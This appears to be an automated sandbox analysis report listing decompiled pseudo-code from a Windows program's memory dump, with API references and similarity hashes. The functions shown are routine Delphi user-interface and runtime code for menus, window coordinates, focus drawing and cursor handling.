                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: x#A$A
                                                                        • API String ID: 3168844106-3646173994
                                                                        • Opcode ID: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction ID: 96df8752f16c2a0022fc4abf683c0cece092d4dd73ebd9113d8584cb1a2c50fe
                                                                        • Opcode Fuzzy Hash: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction Fuzzy Hash: FC217175A04304AFDB11DF69D88184ABBF5FB89720B5285AAF804A7761C678EE40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00449AD8(intOrPtr* __eax) {
                                                                        				struct tagMENUITEMINFOA _v128;
                                                                        				intOrPtr _v132;
                                                                        				int _t16;
                                                                        				intOrPtr* _t29;
                                                                        				struct HMENU__* _t36;
                                                                        				MENUITEMINFOA* _t37;
                                                                        
                                                                        				_t37 =  &_v128;
                                                                        				_t29 = __eax;
                                                                        				_t16 =  *0x495c50; // 0x4967f0
                                                                        				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                        					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                        					_t37->cbSize = 0x2c;
                                                                        					_v132 = 0x10;
                                                                        					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                        					_v128.dwItemData = 0x50;
                                                                        					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                        					if(_t16 != 0) {
                                                                        						_t16 = E00449E5C(_t29);
                                                                        						asm("sbb edx, edx");
                                                                        						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                        							_v128.cbSize = ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) + ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                        							_v132 = 0x10;
                                                                        							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                        							if(_t16 != 0) {
                                                                        								return DrawMenuBar( *(_t29 + 0x38));
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t16;
                                                                        			}










                                                                        APIs
                                                                        • GetMenuItemInfoA.USER32 ref: 00449B26
                                                                        • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00449B78
                                                                        • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00449B85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw
                                                                        • String ID: P
                                                                        • API String ID: 3227129158-3110715001
                                                                        • Opcode ID: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction ID: df4e8d69c2b8ab43fa3eab23de6c9c49e1d9bdfb9557a38750246fd9a3c36f3e
                                                                        • Opcode Fuzzy Hash: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction Fuzzy Hash: 5C116A30605A006BE310DB29CC81B4B7BD5EF8A364F14866AF094DB3D5D779DC859B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043E42C(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				struct tagRECT _v28;
                                                                        				intOrPtr _t19;
                                                                        				struct HWND__* _t20;
                                                                        				intOrPtr* _t23;
                                                                        
                                                                        				_t20 = __eax;
                                                                        				_t1 =  &_a4; // 0x43e6e8
                                                                        				_t23 =  *_t1;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __ecx;
                                                                        				_t4 =  &_v12; // 0x43e6e8
                                                                        				ClientToScreen(__eax, _t4);
                                                                        				GetWindowRect(_t20,  &_v28);
                                                                        				_t6 =  &_v12; // 0x43e6e8
                                                                        				 *_t23 =  *_t6 - _v28.left;
                                                                        				_t19 = _v8 - _v28.top;
                                                                        				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                                        				return _t19;
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClientRectScreenWindow
                                                                        • String ID: C$C
                                                                        • API String ID: 3371951266-238425240
                                                                        • Opcode ID: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction ID: 1f4564615450670a25db1ca0009ad4615392a475f3aeb3dbd1faee911e03ac16
                                                                        • Opcode Fuzzy Hash: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction Fuzzy Hash: D2F0A2B190120DAFCB00DFE9D9818DEFBFCEF08210F10416AA945E3341D631AA508BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040B418() {
                                                                        				_Unknown_base(*)()* _t1;
                                                                        				struct HINSTANCE__* _t3;
                                                                        
                                                                        				_t1 = GetModuleHandleA("kernel32.dll");
                                                                        				_t3 = _t1;
                                                                        				if(_t3 != 0) {
                                                                        					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                        					 *0x47a0e4 = _t1;
                                                                        				}
                                                                        				if( *0x47a0e4 == 0) {
                                                                        					 *0x47a0e4 = E00408B84;
                                                                        					return E00408B84;
                                                                        				}
                                                                        				return _t1;
                                                                        			}





                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0F1,00000000,0040C104), ref: 0040B41E
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B42F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction ID: 6ae0bcb979b928d375a13ebc24deeef97ab0339ec59b2135f7a36ef93f1d17aa
                                                                        • Opcode Fuzzy Hash: e7fe911eb68f28c804d0767d7065684a7dc6f4c980445e1d1472f712646220be
                                                                        • Instruction Fuzzy Hash: 64D05EA020538A8ADB00FFB059C17153594C340708B04843BA106752D3C7BE49A0978E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004269FC() {
                                                                        				struct HINSTANCE__* _t1;
                                                                        				struct HINSTANCE__* _t2;
                                                                        				_Unknown_base(*)()* _t3;
                                                                        
                                                                        				if( *0x496a94 == 0) {
                                                                        					_t1 = GetModuleHandleA("comctl32.dll");
                                                                        					 *0x496a94 = _t1;
                                                                        					if( *0x496a94 != 0) {
                                                                        						_t2 =  *0x496a94; // 0x0
                                                                        						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
                                                                        						 *0x496a98 = _t3;
                                                                        						return _t3;
                                                                        					}
                                                                        				}
                                                                        				return _t1;
                                                                        			}






                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(comctl32.dll,00426A6D,00000200,0046CC12), ref: 00426A0A
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00426A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 1646373207-802336580
                                                                        • Opcode ID: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction ID: b485c5e37fb782eca6cace4d01e2d249d426e4b814a2065c8112e2717f591e71
                                                                        • Opcode Fuzzy Hash: d8e2ff409dd9ceddfd3946d5ebc7b870927ac2dbee9e64dd0fd436275be675c0
                                                                        • Instruction Fuzzy Hash: 70D09EB06412529FE700EFA4BD467117790D323705FA3C43BA04976DB1D67C2454C70C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00464658(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagRECT _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HWND__* _v36;
                                                                        				signed short _v38;
                                                                        				char _v39;
                                                                        				char _v40;
                                                                        				signed int _v52;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				void* _t93;
                                                                        				struct HWND__* _t94;
                                                                        				signed int _t99;
                                                                        				signed int _t100;
                                                                        				signed int _t123;
                                                                        				struct HWND__* _t125;
                                                                        				signed int _t127;
                                                                        				signed int _t129;
                                                                        				void* _t131;
                                                                        				struct HWND__* _t144;
                                                                        				struct HWND__* _t145;
                                                                        				intOrPtr _t148;
                                                                        				void* _t152;
                                                                        				struct HWND__* _t153;
                                                                        				intOrPtr _t155;
                                                                        				intOrPtr _t159;
                                                                        				struct HWND__* _t196;
                                                                        				struct HWND__* _t200;
                                                                        				long _t209;
                                                                        				struct HWND__** _t212;
                                                                        				void* _t213;
                                                                        
                                                                        				_t180 = __ecx;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_v32 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t212 =  &_v8;
                                                                        				_t93 = E00461DEC( *((intOrPtr*)( *_t212 + 0x29c)));
                                                                        				_t214 =  *((intOrPtr*)(_t93 + 8));
                                                                        				if( *((intOrPtr*)(_t93 + 8)) == 0) {
                                                                        					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
                                                                        					return E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                        				}
                                                                        				_t94 =  *_t212;
                                                                        				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
                                                                        				if( *((char*)(_t94 + 0x2e8)) != 1) {
                                                                        					L10:
                                                                        					_t209 = _v28.left;
                                                                        					_v36 = E004641C0( *_t212, _v32);
                                                                        					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
                                                                        					__eflags = _t99;
                                                                        					_t100 = _t99 >> 1;
                                                                        					if(__eflags < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					_v52 = _t100;
                                                                        					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
                                                                        					E0042062C( *((intOrPtr*)( *_t212 + 0x208)));
                                                                        					E0041FC50( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
                                                                        					E004202E8( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                        					_v12 = E0042056C(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
                                                                        					__eflags =  *( *_t212 + 0x22c) - _v32;
                                                                        					if(__eflags == 0) {
                                                                        						E0041FC50( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
                                                                        						E0041F464( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
                                                                        					}
                                                                        					_v40 =  *((intOrPtr*)(_v36 + 0x18));
                                                                        					_v39 = E004627C4(_v36);
                                                                        					_v38 = E00461ED8(_v36);
                                                                        					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
                                                                        					__eflags = _t123 - 5;
                                                                        					if(__eflags > 0) {
                                                                        						L22:
                                                                        						_t125 =  *( *_t212 + 0x22c);
                                                                        						__eflags = _t125 - _v32;
                                                                        						if(_t125 != _v32) {
                                                                        							goto L35;
                                                                        						}
                                                                        						_t125 = _v36;
                                                                        						__eflags =  *(_t125 + 8);
                                                                        						if( *(_t125 + 8) == 0) {
                                                                        							goto L35;
                                                                        						}
                                                                        						_t127 =  *( *_t212 + 0x234);
                                                                        						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
                                                                        						_t196 =  *_t212;
                                                                        						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
                                                                        						if( *((char*)(_t196 + 0x2e0)) >= 4) {
                                                                        							_v28.left = _v28.left - _v52;
                                                                        							_t200 =  *_t212;
                                                                        							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
                                                                        							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
                                                                        								_t76 =  &_v28;
                                                                        								 *_t76 = _v28.left + _t127;
                                                                        								__eflags =  *_t76;
                                                                        							}
                                                                        						}
                                                                        						_t129 =  *( *_t212 + 0x2e0);
                                                                        						__eflags = _t129;
                                                                        						if(_t129 != 0) {
                                                                        							__eflags = _t129 - 4;
                                                                        							if(_t129 != 4) {
                                                                        								_t80 =  &_v28;
                                                                        								 *_t80 = _v28.left +  *( *_t212 + 0x234);
                                                                        								__eflags =  *_t80;
                                                                        							}
                                                                        						}
                                                                        						__eflags = _t129 - 3;
                                                                        						if(_t129 == 3) {
                                                                        							_t83 =  &_v28;
                                                                        							 *_t83 = _v28.left +  *( *_t212 + 0x234);
                                                                        							__eflags =  *_t83;
                                                                        						}
                                                                        						_t131 = E0043CC2C( *_t212);
                                                                        						_t125 = GetFocus();
                                                                        						__eflags = _t131 - _t125;
                                                                        						if(_t131 != _t125) {
                                                                        							goto L35;
                                                                        						} else {
                                                                        							_t125 =  *_t212;
                                                                        							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                        							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                        								goto L35;
                                                                        							}
                                                                        							return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                        						}
                                                                        					} else {
                                                                        						switch( *((intOrPtr*)(_t123 * 4 +  &M00464838))) {
                                                                        							case 0:
                                                                        								E00464230(_t213);
                                                                        								goto L22;
                                                                        							case 1:
                                                                        								__eax = E0046443C(__edi, __esi, __ebp);
                                                                        								goto L22;
                                                                        							case 2:
                                                                        								__eax = E0046438C(__edi, __ebp);
                                                                        								goto L22;
                                                                        							case 3:
                                                                        								__eax = E00464280(__edi, __esi, __ebp);
                                                                        								goto L22;
                                                                        							case 4:
                                                                        								__eax = E004644EC(__edi, __esi, __eflags, __ebp);
                                                                        								goto L22;
                                                                        							case 5:
                                                                        								__eax = E00464574(__edi, __eflags, __ebp);
                                                                        								goto L22;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t144 =  *_t212;
                                                                        					__eflags =  *((short*)(_t144 + 0x2f2));
                                                                        					if( *((short*)(_t144 + 0x2f2)) == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					_t145 =  *_t212;
                                                                        					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
                                                                        					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
                                                                        						_t148 =  *0x464948; // 0x0
                                                                        						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
                                                                        					}
                                                                        					_t152 = E0043CC2C( *_t212);
                                                                        					_t153 = GetFocus();
                                                                        					__eflags = _t152 - _t153;
                                                                        					if(_t152 != _t153) {
                                                                        						_t155 =  *0x464944; // 0x1
                                                                        						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
                                                                        					}
                                                                        					_t159 =  *0x464940; // 0x11
                                                                        					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
                                                                        					_t125 =  *_t212;
                                                                        					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                        					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                        						L35:
                                                                        						return _t125;
                                                                        					}
                                                                        					return DrawFocusRect(E00420730( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetFocus.USER32 ref: 004646E0
                                                                        • DrawFocusRect.USER32 ref: 00464728
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FocusRect$DrawFill
                                                                        • String ID:
                                                                        • API String ID: 3476037706-0
                                                                        • Opcode ID: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction ID: 2e9b2cd7af3be85b1ad5ab87c8741589f721a3b3221bc1c176d7526e71f5910d
                                                                        • Opcode Fuzzy Hash: bd1cc9d83fbb64b7a4748703e1cad8a8f26c1da09dfb4c53e68ded7458c0d174
                                                                        • Instruction Fuzzy Hash: 83916F34A00145CFCB10EF68C485EAEB7F5BF99314F2445BAE5849B326E738AC45CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004344BC(intOrPtr* __eax, signed int __edx) {
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				intOrPtr _t53;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t56;
                                                                        				intOrPtr* _t60;
                                                                        				intOrPtr* _t62;
                                                                        				struct HICON__* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr* _t72;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr* _t75;
                                                                        				intOrPtr _t78;
                                                                        				intOrPtr _t80;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr _t84;
                                                                        				intOrPtr _t85;
                                                                        				struct HWND__* _t88;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t91;
                                                                        				intOrPtr* _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t100;
                                                                        				intOrPtr _t102;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t104;
                                                                        				intOrPtr _t106;
                                                                        				struct HWND__* _t107;
                                                                        				intOrPtr _t108;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr _t117;
                                                                        				char _t118;
                                                                        				intOrPtr _t119;
                                                                        				void* _t131;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t140;
                                                                        				intOrPtr* _t155;
                                                                        				void* _t158;
                                                                        				void* _t165;
                                                                        				void* _t166;
                                                                        
                                                                        				_t155 = __eax;
                                                                        				if( *0x496ba8 != 0) {
                                                                        					L3:
                                                                        					_t49 =  *0x496b88; // 0x0
                                                                        					_t50 =  *0x496b88; // 0x0
                                                                        					_t117 = E0043439C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                        					if( *0x496ba8 == 0) {
                                                                        						_t168 =  *0x496bac;
                                                                        						if( *0x496bac != 0) {
                                                                        							_t106 =  *0x496b9c; // 0x0
                                                                        							_t107 = GetDesktopWindow();
                                                                        							_t108 =  *0x496bac; // 0x0
                                                                        							E0043E5DC(_t108, _t107, _t168, _t106);
                                                                        						}
                                                                        					}
                                                                        					_t53 =  *0x496b88; // 0x0
                                                                        					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                        						__eflags =  *0x496ba8;
                                                                        						_t6 =  &_v24;
                                                                        						 *_t6 =  *0x496ba8 != 0;
                                                                        						__eflags =  *_t6;
                                                                        						 *0x496ba8 = 2;
                                                                        					} else {
                                                                        						 *0x496ba8 = 1;
                                                                        						_v24 = 0;
                                                                        					}
                                                                        					_t54 =  *0x496b8c; // 0x0
                                                                        					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                        						L12:
                                                                        						_t55 =  *0x496b8c; // 0x0
                                                                        						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                        						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                        						_t56 =  *0x496b8c; // 0x0
                                                                        						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                        							_t97 =  *0x496b8c; // 0x0
                                                                        							E004360F0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                        							_t100 =  *0x496b8c; // 0x0
                                                                        							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                        							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                        						}
                                                                        						_t131 = E004343EC(2);
                                                                        						_t121 =  *_t155;
                                                                        						_t60 =  *0x496b8c; // 0x0
                                                                        						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                        						if( *0x496bac != 0) {
                                                                        							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                        								_t82 =  *0x496bac; // 0x0
                                                                        								E0043E598(_t82, _t158);
                                                                        								_t84 =  *0x496bac; // 0x0
                                                                        								_t177 =  *((char*)(_t84 + 0x6a));
                                                                        								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                        									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                        									_t85 =  *0x496bac; // 0x0
                                                                        									E0043E6C4(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                        								} else {
                                                                        									_t88 = GetDesktopWindow();
                                                                        									_t121 =  *_t155;
                                                                        									_t89 =  *0x496bac; // 0x0
                                                                        									E0043E5DC(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                        								}
                                                                        							} else {
                                                                        								_t91 =  *0x496bac; // 0x0
                                                                        								E0043E738(_t91, _t131, __eflags);
                                                                        								_t93 =  *0x495c2c; // 0x496c08
                                                                        								SetCursor(E0045469C( *_t93, _t158));
                                                                        							}
                                                                        						}
                                                                        						_t62 =  *0x495c2c; // 0x496c08
                                                                        						_t65 = SetCursor(E0045469C( *_t62, _t158));
                                                                        						if( *0x496ba8 != 2) {
                                                                        							L32:
                                                                        							return _t65;
                                                                        						} else {
                                                                        							_t179 = _t117;
                                                                        							if(_t117 != 0) {
                                                                        								_t118 = E00434428(_t121);
                                                                        								_t67 =  *0x496b8c; // 0x0
                                                                        								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                        								__eflags = _t118;
                                                                        								if(__eflags != 0) {
                                                                        									E004360F0(_t118,  &_v24, _t155);
                                                                        									_t65 = E004037D8(_t118, __eflags);
                                                                        									_t135 =  *0x496b8c; // 0x0
                                                                        									 *(_t135 + 0x54) = _t65;
                                                                        								} else {
                                                                        									_t78 =  *0x496b8c; // 0x0
                                                                        									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                        									_t140 =  *0x496b8c; // 0x0
                                                                        									 *(_t140 + 0x54) = _t65;
                                                                        								}
                                                                        							} else {
                                                                        								_push( *((intOrPtr*)(_t155 + 4)));
                                                                        								_t80 =  *0x496b8c; // 0x0
                                                                        								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                        							}
                                                                        							if( *0x496b8c == 0) {
                                                                        								goto L32;
                                                                        							} else {
                                                                        								_t119 =  *0x496b8c; // 0x0
                                                                        								_t41 = _t119 + 0x5c; // 0x5c
                                                                        								_t42 = _t119 + 0x44; // 0x44
                                                                        								_t65 = E00408514(_t42, 0x10, _t41);
                                                                        								if(_t65 != 0) {
                                                                        									goto L32;
                                                                        								}
                                                                        								if(_v28 != 0) {
                                                                        									_t75 =  *0x496b8c; // 0x0
                                                                        									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                        								}
                                                                        								_t72 =  *0x496b8c; // 0x0
                                                                        								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                        								_t74 =  *0x496b8c; // 0x0
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								return _t74;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t65 = E004343EC(1);
                                                                        					if( *0x496b8c == 0) {
                                                                        						goto L32;
                                                                        					}
                                                                        					_t102 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                        					_t103 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                        					_t104 =  *0x496b8c; // 0x0
                                                                        					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                        					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                        					_t65 = E004343EC(0);
                                                                        					if( *0x496b8c == 0) {
                                                                        						goto L32;
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        				_t110 =  *0x496b98; // 0x0
                                                                        				asm("cdq");
                                                                        				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x496ba4; // 0x0
                                                                        				if(_t165 >= 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t114 =  *0x496b9c; // 0x0
                                                                        				asm("cdq");
                                                                        				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                        				_t166 = _t65 -  *0x496ba4; // 0x0
                                                                        				if(_t166 < 0) {
                                                                        					goto L32;
                                                                        				}
                                                                        				goto L3;
                                                                        			}


                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 00434530
                                                                        • GetDesktopWindow.USER32 ref: 00434655
                                                                        • SetCursor.USER32(00000000), ref: 004346AA
                                                                          • Part of subcall function 0043E738: 73451770.COMCTL32(00000000,?,00434685), ref: 0043E754
                                                                          • Part of subcall function 0043E738: ShowCursor.USER32(000000FF,00000000,?,00434685), ref: 0043E76F
                                                                        • SetCursor.USER32(00000000), ref: 00434695
                                                                        Memory Dump Source
